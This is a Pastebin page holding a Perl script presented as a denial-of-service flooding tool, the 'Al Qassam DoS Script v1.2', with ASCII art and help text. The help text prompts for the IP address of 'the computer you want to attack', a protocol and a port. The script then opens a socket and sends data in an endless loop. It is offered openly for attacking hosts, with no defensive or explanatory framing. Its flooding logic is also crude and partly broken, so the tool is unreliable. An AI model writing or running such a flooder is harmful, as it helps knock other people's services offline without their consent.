iViiRuS

al qassam dos script v1.2 *PERL**

Dec 20th, 2013
232
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!usr/bin/Perl
  2. #Coded by Sheikh ViiRuS
  3.  
  4.  
  5. use IO::Socket;
  6.  
  7. print "\n
  8.   |            
  9.  / \                                                            
  10. /   \                                              
  11. (_____)                                            
  12. |   | +___________________________________+      
  13. |   |     ____________________________    |              
  14. |   | |  |                            |   |                      
  15. |   | |  |                            |   |      
  16. |   | |  |                            | O |    
  17. |   | |  |                            | O |      
  18. |   | |  |____________________________|   |      
  19. |___|    _____________________________________                          
  20.     +--| \ [][][][][][][][][][][][][] [][][]  \
  21.           \ [][][][][][][][][][][][]  [][][]  \
  22.            \ __________________________________\
  23.              ____________________________________|
  24.                
  25.       Al Qassam DoS Script v1.2 Coded by Sheikh ViiRuS  
  26.                    
  27. \n\a";
  28.  
  29. print "\nHelp: You will be prompted with three boxes. Host, Protocol and Port. Host means the IP Address of the computer you want to attack, Protocol is to flood TCP or UDP to flood both type TCP,UDP in the box, and port is the port you would like to boot them off example: DNS is port 53, Web browser is port 80.\n\a";
  30.  
  31. print "\nHost:\a";
  32. chomp ($host = <STDIN>);
  33.  
  34. print "\nProtocol:\a";
  35. chomp ($proto = <STDIN>);
  36.  
  37. print "\nPort:\a";
  38. chomp ($port = <STDIN>);
  39.  
  40. {
  41.  
  42. $sock = IO::Socket::INET->new(Proto=>"$proto", PeerAddr=>"$host", PeerPort=>"$port") || die "\nCould not connect to the remote machine. Either the machine is offline or the port is not in use on the selected protocol.\a";
  43.  
  44. }
  45.  
  46. Packets:
  47. while (1) {
  48. $size = rand() * 8921873 * 9991988;
  49. print ("Flooding: $host:$port~$proto Packets Sent: $size\n");
  50. send($sock, 0, $size)
  51.  
  52. }
RAW Paste Data